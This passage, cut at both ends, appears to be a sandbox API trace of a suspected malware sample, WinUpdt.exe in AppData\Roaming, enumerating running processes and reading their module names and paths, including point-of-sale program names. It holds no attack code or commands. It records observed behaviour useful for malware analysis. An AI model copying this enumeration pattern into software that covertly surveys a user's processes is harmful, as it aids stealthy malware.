lpcbNeeded=0x39e760 | out: lphModule=0x2321f78, lpcbNeeded=0x39e760) returned 1 [0064.370] GetModuleInformation (in: hProcess=0x1e8, hModule=0xbd0000, lpmodinfo=0x23220b8, cb=0xc | out: lpmodinfo=0x23220b8*(lpBaseOfDll=0xbd0000, SizeOfImage=0x17000, EntryPoint=0xbd14a1)) returned 1 [0064.371] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.371] GetModuleBaseNameW (in: hProcess=0x1e8, hModule=0xbd0000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0064.371] CoTaskMemFree (pv=0x7943e0) [0064.371] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.371] GetModuleFileNameExW (in: hProcess=0x1e8, hModule=0xbd0000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Google\\foxmailincmail.exe" (normalized: "c:\\program files (x86)\\google\\foxmailincmail.exe")) returned 0x30 [0064.371] CoTaskMemFree (pv=0x7943e0) [0064.371] CloseHandle (hObject=0x1e8) returned 1 [0064.371] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.371] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x85c) returned 0x1e8 [0064.371] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x23243b0, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23243b0, lpcbNeeded=0x39e760) returned 1 [0064.372] GetModuleInformation (in: hProcess=0x1e8, hModule=0xd10000, lpmodinfo=0x23244f0, cb=0xc | out: lpmodinfo=0x23244f0*(lpBaseOfDll=0xd10000, SizeOfImage=0x17000, EntryPoint=0xd114a1)) returned 1 [0064.373] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.373] GetModuleBaseNameW (in: hProcess=0x1e8, hModule=0xd10000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="skype.exe") returned 0x9 [0064.373] CoTaskMemFree (pv=0x7943e0) [0064.373] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.373] GetModuleFileNameExW (in: hProcess=0x1e8, hModule=0xd10000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Sidebar\\skype.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\skype.exe")) returned 0x30 [0064.373] CoTaskMemFree (pv=0x7943e0) [0064.373] CloseHandle (hObject=0x1e8) returned 1 [0064.373] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.373] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0064.373] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x23267d4, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23267d4, lpcbNeeded=0x39e760) returned 0 [0064.374] GetCurrentProcessId () returned 0x8e8 [0064.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e4 [0064.374] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.374] IsWow64Process (in: hProcess=0x1e8, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.375] CloseHandle (hObject=0x1e4) returned 1 [0064.375] CloseHandle (hObject=0x1e8) returned 1 [0064.375] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x91c) returned 0x1e8 [0064.375] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x2326a64, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2326a64, lpcbNeeded=0x39e760) returned 1 [0064.376] GetModuleInformation (in: hProcess=0x1e8, hModule=0x10f0000, lpmodinfo=0x2326ba4, cb=0xc | out: lpmodinfo=0x2326ba4*(lpBaseOfDll=0x10f0000, SizeOfImage=0x17000, EntryPoint=0x10f14a1)) returned 1 [0064.376] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.376] GetModuleBaseNameW (in: hProcess=0x1e8, hModule=0x10f0000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="aldelo.exe") returned 0xa [0064.377] CoTaskMemFree (pv=0x7943e0) [0064.377] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.377] GetModuleFileNameExW (in: hProcess=0x1e8, hModule=0x10f0000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Mozilla Firefox\\aldelo.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\aldelo.exe")) returned 0x31 [0064.377] CoTaskMemFree (pv=0x7943e0) [0064.377] CloseHandle (hObject=0x1e8) returned 1 [0064.377] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.377] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0064.377] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x2328e8c, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2328e8c, lpcbNeeded=0x39e760) returned 0 [0064.377] GetCurrentProcessId () returned 0x8e8 [0064.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e4 [0064.377] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.378] IsWow64Process (in: hProcess=0x1e8, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.379] CloseHandle (hObject=0x1e4) returned 1 [0064.379] CloseHandle (hObject=0x1e8) returned 1 [0064.379] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x98c) returned 0x1e8 [0064.379] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x232911c, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x232911c, lpcbNeeded=0x39e760) returned 1 [0064.380] GetModuleInformation (in: hProcess=0x1e8, hModule=0x12b0000, lpmodinfo=0x232925c, cb=0xc | out: lpmodinfo=0x232925c*(lpBaseOfDll=0x12b0000, SizeOfImage=0x17000, EntryPoint=0x12b14a1)) returned 1 [0064.380] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.380] GetModuleBaseNameW (in: hProcess=0x1e8, hModule=0x12b0000, lpBaseName=0x794888, nSize=0x800 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0064.381] CoTaskMemFree (pv=0x794888) [0064.381] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.381] GetModuleFileNameExW (in: hProcess=0x1e8, hModule=0x12b0000, lpFilename=0x794888, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Adobe\\mxslipstream.exe" (normalized: "c:\\program files (x86)\\adobe\\mxslipstream.exe")) returned 0x2d [0064.381] CoTaskMemFree (pv=0x794888) [0064.381] CloseHandle (hObject=0x1e8) returned 1 [0064.381] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.381] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9dc) returned 0x1e8 [0064.381] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x232b548, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x232b548, lpcbNeeded=0x39e760) returned 1 [0064.382] GetModuleInformation (in: hProcess=0x1e8, hModule=0xf50000, lpmodinfo=0x232b688, cb=0xc | out: lpmodinfo=0x232b688*(lpBaseOfDll=0xf50000, SizeOfImage=0x17000, EntryPoint=0xf514a1)) returned 1 [0064.382] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.382] GetModuleBaseNameW (in: hProcess=0x1e8, hModule=0xf50000, lpBaseName=0x794888, nSize=0x800 | out: lpBaseName="hdresumesplatinum.exe") returned 0x15 [0064.383] CoTaskMemFree (pv=0x794888) [0064.383] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.383] GetModuleFileNameExW (in: hProcess=0x1e8, hModule=0xf50000, lpFilename=0x794888, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Google\\hdresumesplatinum.exe" (normalized: "c:\\program files (x86)\\google\\hdresumesplatinum.exe")) returned 0x33 [0064.383] CoTaskMemFree (pv=0x794888) [0064.383] CloseHandle (hObject=0x1e8) returned 1 [0064.383] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.383] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x788) returned 0x1e8 [0064.383] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x232d988, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x232d988, lpcbNeeded=0x39e760) returned 1 [0064.384] GetModuleInformation (in: hProcess=0x1e8, hModule=0xae0000, lpmodinfo=0x232dac8, cb=0xc | out: lpmodinfo=0x232dac8*(lpBaseOfDll=0xae0000, SizeOfImage=0x17000, EntryPoint=0xae14a1)) returned 1 [0064.384] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.384] GetModuleBaseNameW (in: hProcess=0x1e8, hModule=0xae0000, lpBaseName=0x794888, nSize=0x800 | out: lpBaseName="leechftp.exe") returned 0xc [0064.385] CoTaskMemFree (pv=0x794888) [0064.385] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.385] GetModuleFileNameExW (in: hProcess=0x1e8, hModule=0xae0000, lpFilename=0x794888, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Defender\\leechftp.exe" (normalized: "c:\\program files (x86)\\windows defender\\leechftp.exe")) returned 0x34 [0064.385] CoTaskMemFree (pv=0x794888) [0064.385] CloseHandle (hObject=0x1e8) returned 1 [0064.385] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.385] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x84c) returned 0x1e8 [0064.385] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x232fdbc, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x232fdbc, lpcbNeeded=0x39e760) returned 1 [0064.386] GetModuleInformation (in: hProcess=0x1e8, hModule=0xa60000, lpmodinfo=0x232fefc, cb=0xc | out: lpmodinfo=0x232fefc*(lpBaseOfDll=0xa60000, SizeOfImage=0x17000, EntryPoint=0xa614a1)) returned 1 [0064.386] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.386] GetModuleBaseNameW (in: hProcess=0x1e8, hModule=0xa60000, lpBaseName=0x794888, nSize=0x800 | out: lpBaseName="scriptftp.exe") returned 0xd [0064.387] CoTaskMemFree (pv=0x794888) [0064.387] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.387] GetModuleFileNameExW (in: hProcess=0x1e8, hModule=0xa60000, lpFilename=0x794888, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Java\\scriptftp.exe" (normalized: "c:\\program files (x86)\\java\\scriptftp.exe")) returned 0x29 [0064.387] CoTaskMemFree (pv=0x794888) [0064.387] CloseHandle (hObject=0x1e8) returned 1 [0064.388] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.388] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0064.390] EnumProcesses (in: lpidProcess=0x23321d8, cb=0x400, lpcbNeeded=0x39e6d8 | out: lpidProcess=0x23321d8, lpcbNeeded=0x39e6d8) returned 1 [0064.396] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x39e434, nSize=0x101, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0064.404] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x15c) returned 0x1e4 [0064.404] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2332d74, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2332d74, lpcbNeeded=0x39e760) returned 1 [0064.405] GetModuleInformation (in: hProcess=0x1e4, hModule=0xc70000, lpmodinfo=0x2332eb4, cb=0xc | out: lpmodinfo=0x2332eb4*(lpBaseOfDll=0xc70000, SizeOfImage=0x17000, EntryPoint=0xc714a1)) returned 1 [0064.405] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.405] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xc70000, lpBaseName=0x794888, nSize=0x800 | out: lpBaseName="hist install intend.exe") returned 0x17 [0064.406] CoTaskMemFree (pv=0x794888) [0064.406] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.406] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xc70000, lpFilename=0x794888, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Reference Assemblies\\hist install intend.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\hist install intend.exe")) returned 0x43 [0064.406] CoTaskMemFree (pv=0x794888) [0064.406] CloseHandle (hObject=0x1e4) returned 1 [0064.406] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.406] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x534) returned 0x1e4 [0064.406] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x23351d8, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23351d8, lpcbNeeded=0x39e760) returned 1 [0064.407] GetModuleInformation (in: hProcess=0x1e4, hModule=0x1040000, lpmodinfo=0x2335318, cb=0xc | out: lpmodinfo=0x2335318*(lpBaseOfDll=0x1040000, SizeOfImage=0x17000, EntryPoint=0x10414a1)) returned 1 [0064.407] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.408] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x1040000, lpBaseName=0x794888, nSize=0x800 | out: lpBaseName="pregnant_reasoning.exe") returned 0x16 [0064.408] CoTaskMemFree (pv=0x794888) [0064.408] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.408] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x1040000, lpFilename=0x794888, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Sidebar\\pregnant_reasoning.exe" (normalized: "c:\\program files\\windows sidebar\\pregnant_reasoning.exe")) returned 0x37 [0064.408] CoTaskMemFree (pv=0x794888) [0064.408] CloseHandle (hObject=0x1e4) returned 1 [0064.408] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.408] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90c) returned 0x1e4 [0064.408] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2337624, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2337624, lpcbNeeded=0x39e760) returned 1 [0064.410] GetModuleInformation (in: hProcess=0x1e4, hModule=0x1170000, lpmodinfo=0x2337764, cb=0xc | out: lpmodinfo=0x2337764*(lpBaseOfDll=0x1170000, SizeOfImage=0x17000, EntryPoint=0x11714a1)) returned 1 [0064.410] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.410] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x1170000, lpBaseName=0x794888, nSize=0x800 | out: lpBaseName="afr38.exe") returned 0x9 [0064.410] CoTaskMemFree (pv=0x794888) [0064.410] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.410] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x1170000, lpFilename=0x794888, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Photo Viewer\\afr38.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\afr38.exe")) returned 0x35 [0064.410] CoTaskMemFree (pv=0x794888) [0064.411] CloseHandle (hObject=0x1e4) returned 1 [0064.411] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.411] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x780) returned 0x1e4 [0064.411] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2339a50, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2339a50, lpcbNeeded=0x39e760) returned 1 [0064.412] GetModuleInformation (in: hProcess=0x1e4, hModule=0xd90000, lpmodinfo=0x2339b90, cb=0xc | out: lpmodinfo=0x2339b90*(lpBaseOfDll=0xd90000, SizeOfImage=0x17000, EntryPoint=0xd914a1)) returned 1 [0064.412] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.412] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xd90000, lpBaseName=0x794888, nSize=0x800 | out: lpBaseName="enforcement_refine_earned.exe") returned 0x1d [0064.412] CoTaskMemFree (pv=0x794888) [0064.412] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.412] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xd90000, lpFilename=0x794888, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Defender\\enforcement_refine_earned.exe" (normalized: "c:\\program files (x86)\\windows defender\\enforcement_refine_earned.exe")) returned 0x45 [0064.413] CoTaskMemFree (pv=0x794888) [0064.413] CloseHandle (hObject=0x1e4) returned 1 [0064.413] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.413] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9cc) returned 0x1e4 [0064.413] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x233bec4, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x233bec4, lpcbNeeded=0x39e760) returned 1 [0064.414] GetModuleInformation (in: hProcess=0x1e4, hModule=0x60000, lpmodinfo=0x233c004, cb=0xc | out: lpmodinfo=0x233c004*(lpBaseOfDll=0x60000, SizeOfImage=0x17000, EntryPoint=0x614a1)) returned 1 [0064.414] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.414] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x60000, lpBaseName=0x794888, nSize=0x800 | out: lpBaseName="utg2.exe") returned 0x8 [0064.414] CoTaskMemFree (pv=0x794888) [0064.414] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.414] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x60000, lpFilename=0x794888, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Mozilla Maintenance Service\\utg2.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\utg2.exe")) returned 0x3b [0064.415] CoTaskMemFree (pv=0x794888) [0064.415] CloseHandle (hObject=0x1e4) returned 1 [0064.415] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.415] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1e4 [0064.415] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x233e2fc, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x233e2fc, lpcbNeeded=0x39e760) returned 0 [0064.415] GetCurrentProcessId () returned 0x8e8 [0064.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e0 [0064.415] IsWow64Process (in: hProcess=0x1e0, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.415] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.416] CloseHandle (hObject=0x1e0) returned 1 [0064.416] CloseHandle (hObject=0x1e4) returned 1 [0064.416] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x83c) returned 0x1e4 [0064.416] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x233e58c, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x233e58c, lpcbNeeded=0x39e760) returned 1 [0064.417] GetModuleInformation (in: hProcess=0x1e4, hModule=0xef0000, lpmodinfo=0x233e6cc, cb=0xc | out: lpmodinfo=0x233e6cc*(lpBaseOfDll=0xef0000, SizeOfImage=0x17000, EntryPoint=0xef14a1)) returned 1 [0064.418] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.418] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xef0000, lpBaseName=0x794888, nSize=0x800 | out: lpBaseName="pidgin.exe") returned 0xa [0064.418] CoTaskMemFree (pv=0x794888) [0064.418] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.418] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xef0000, lpFilename=0x794888, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Journal\\pidgin.exe" (normalized: "c:\\program files\\windows journal\\pidgin.exe")) returned 0x2b [0064.418] CoTaskMemFree (pv=0x794888) [0064.418] CloseHandle (hObject=0x1e4) returned 1 [0064.418] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.418] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x1e4 [0064.419] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x23409a8, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23409a8, lpcbNeeded=0x39e760) returned 0 [0064.419] GetCurrentProcessId () returned 0x8e8 [0064.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e0 [0064.419] IsWow64Process (in: hProcess=0x1e0, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.419] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.420] CloseHandle (hObject=0x1e0) returned 1 [0064.420] CloseHandle (hObject=0x1e4) returned 1 [0064.420] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x774) returned 0x1e4 [0064.420] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2340c38, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2340c38, lpcbNeeded=0x39e760) returned 1 [0064.421] GetModuleInformation (in: hProcess=0x1e4, hModule=0x1280000, lpmodinfo=0x2340d78, cb=0xc | out: lpmodinfo=0x2340d78*(lpBaseOfDll=0x1280000, SizeOfImage=0x17000, EntryPoint=0x12814a1)) returned 1 [0064.421] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.421] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x1280000, lpBaseName=0x794888, nSize=0x800 | out: lpBaseName="cool urban vietnam.exe") returned 0x16 [0064.421] CoTaskMemFree (pv=0x794888) [0064.422] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.422] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x1280000, lpFilename=0x794888, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows NT\\cool urban vietnam.exe" (normalized: "c:\\program files (x86)\\windows nt\\cool urban vietnam.exe")) returned 0x38 [0064.422] CoTaskMemFree (pv=0x794888) [0064.422] CloseHandle (hObject=0x1e4) returned 1 [0064.422] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.422] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8fc) returned 0x1e4 [0064.422] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2343088, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2343088, lpcbNeeded=0x39e760) returned 1 [0064.423] GetModuleInformation (in: hProcess=0x1e4, hModule=0x9b0000, lpmodinfo=0x23431c8, cb=0xc | out: lpmodinfo=0x23431c8*(lpBaseOfDll=0x9b0000, SizeOfImage=0x17000, EntryPoint=0x9b14a1)) returned 1 [0064.424] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.424] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x9b0000, lpBaseName=0x794888, nSize=0x800 | out: lpBaseName="accupos.exe") returned 0xb [0064.424] CoTaskMemFree (pv=0x794888) [0064.424] CoTaskMemAlloc (cb=0x804) returned 0x794888 [0064.424] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x9b0000, lpFilename=0x794888, nSize=0x800 | out: lpFilename="C:\\Program Files\\Microsoft Synchronization Services\\accupos.exe" (normalized: "c:\\program files\\microsoft synchronization services\\accupos.exe")) returned 0x3f [0064.424] CoTaskMemFree (pv=0x794888) [0064.424] CloseHandle (hObject=0x1e4) returned 1 [0064.424] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.425] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x1e4 [0064.425] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x23454cc, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23454cc, lpcbNeeded=0x39e760) returned 0 [0064.425] GetCurrentProcessId () returned 0x8e8 [0064.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e0 [0064.425] IsWow64Process (in: hProcess=0x1e0, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.425] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.426] CloseHandle (hObject=0x1e0) returned 1 [0064.426] CloseHandle (hObject=0x1e4) returned 1 [0064.426] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa40) returned 0x1e4 [0064.426] EnumProcessModules (in: 